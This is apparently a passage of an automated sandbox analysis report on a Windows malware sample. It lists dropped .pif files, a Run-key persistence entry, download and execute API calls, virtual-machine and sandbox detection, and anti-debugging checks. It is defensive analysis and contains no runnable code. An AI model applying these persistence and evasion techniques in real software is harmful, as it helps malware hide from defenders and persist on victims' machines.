                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_028AD0AC push 028AD125h; ret 0_2_028AD11D
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_0289306B push 028930B9h; ret 0_2_028930B1
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_0289306C push 028930B9h; ret 0_2_028930B1
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_028AD1F8 push 028AD288h; ret 0_2_028AD280
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_0289F108 push ecx; mov dword ptr [esp], edx 0_2_0289F10D
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_028AD144 push 028AD1ECh; ret 0_2_028AD1E4
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_02886782 push 028867C6h; ret 0_2_028867BE
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_02886784 push 028867C6h; ret 0_2_028867BE
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_0288D5A0 push 0288D5CCh; ret 0_2_0288D5C4
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_0288C56C push ecx; mov dword ptr [esp], edx 0_2_0288C571
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_028AC570 push 028AC56Eh; ret 0_2_028AC566
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_02898AD8 push 02898B10h; ret 0_2_02898B08
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_0289AAE0 push 0289AB18h; ret 0_2_0289AB10
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_028F4A50 push eax; ret 0_2_028F4B20
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_0288CBEC push 0288CD72h; ret 0_2_0288CD6A
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_0289886C push 028988AEh; ret 0_2_028988A6
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_0289790C push 02897989h; ret 0_2_02897981
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_02896948 push 028969F3h; ret 0_2_028969EB
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_02896946 push 028969F3h; ret 0_2_028969EB
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_0288C95F push 0288CD72h; ret 0_2_0288CD6A
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_02895E7C push ecx; mov dword ptr [esp], edx 0_2_02895E7E
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe Code function: 0_2_02892F60 push 02892FD6h; ret 0_2_02892FCE
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B171ED push ecx; ret 5_2_00B17200
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B1722B push ecx; ret 5_2_00B1723E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_046B7186 push ecx; ret 8_2_046B7199

                  Persistence and Installation Behavior

                  Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
                  Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\xpha.pif
                  Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\Libraries\Bzaszylr.PIF
                  Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_04666EEB ShellExecuteW,URLDownloadToFileW, 8_2_04666EEB

                  Boot Survival

                  Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
                  Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\xpha.pif
                  Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 8_2_0467AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 8_2_0467AADB
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Bzaszylr
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe | Code function: 0_2_0289AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0289AB1C
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\colorcpl.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIF | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0466F7E2 Sleep,ExitProcess,8_2_0466F7E2
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0040F7E2 Sleep,ExitProcess,17_2_0040F7E2
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_051304FD Sleep,ExitProcess,17_2_051304FD
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,8_2_0467A7D9
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,17_2_0041A7D9
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,17_2_0513B4F4
                  Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 662Jump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 9320Jump to behavior
                  Source: C:\Users\Public\alpha.pifAPI coverage: 6.3 %
                  Source: C:\Users\Public\alpha.pifAPI coverage: 7.7 %
                  Source: C:\Windows\SysWOW64\SndVol.exeAPI coverage: 3.4 %
                  Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1620Thread sleep time: -1986000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1620Thread sleep time: -27960000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\esentutl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                  Source: C:\Windows\SysWOW64\esentutl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\Public\xpha.pifLast function: Thread delayed
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_02885908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02885908
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B10207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,5_2_00B10207
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B1589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,5_2_00B1589A
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B14EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,5_2_00B14EC1
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B23E66 FindFirstFileW,FindNextFileW,FindClose,5_2_00B23E66
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B0532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,5_2_00B0532E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_046696A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_046696A0
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0466928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_0466928E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0467C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_0467C322
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0466C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0466C388
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0466BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0466BD72
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04667877 FindFirstFileW,FindNextFileW,8_2_04667877
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04668847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_04668847
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0466BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0466BB6B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04679B86 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_04679B86
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B1589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,10_2_00B1589A
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B10207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,10_2_00B10207
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B14EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00B14EC1
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B23E66 FindFirstFileW,FindNextFileW,FindClose,10_2_00B23E66
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B0532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,10_2_00B0532E
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_0040928E
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_0041C322
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,17_2_0040C388
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_004096A0
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_00408847
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00407877 FindFirstFileW,FindNextFileW,17_2_00407877
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040BB6B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,17_2_00419B86
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040BD72
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05128592 FindFirstFileW,FindNextFileW,17_2_05128592
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0512A3BB __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_0512A3BB
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0512C886 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0512C886
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0513A8A1 FindFirstFileW,17_2_0513A8A1
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0512CA8D FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0512CA8D
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05129562 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_05129562
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0513D03D FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_0513D03D
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0512D0A3 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,17_2_0512D0A3
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05129FA9 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_05129FA9
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04667CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_04667CD2
                  Source: AWkpqJMxci.exe, 00000000.00000002.1781709227.000000000075B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                  Source: AWkpqJMxci.exe, 00000000.00000002.1781709227.0000000000785000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWR
                  Source: xpha.pif, 0000000B.00000002.1870785987.000000000343B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls
                  Source: AWkpqJMxci.exe, 00000000.00000002.1781709227.0000000000785000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: colorcpl.exe, 00000008.00000002.4115847065.00000000027BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
                  Source: Bzaszylr.PIF, 00000014.00000002.1986625678.0000000000608000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
                  Source: Bzaszylr.PIF, 00000010.00000002.1911607370.00000000007AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeAPI call chain: ExitProcess graph end nodegraph_0-33210
                  Source: C:\Windows\SysWOW64\colorcpl.exeAPI call chain: ExitProcess graph end nodegraph_8-95025
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0289F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_0289F744
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFProcess queried: DebugPortJump to behavior
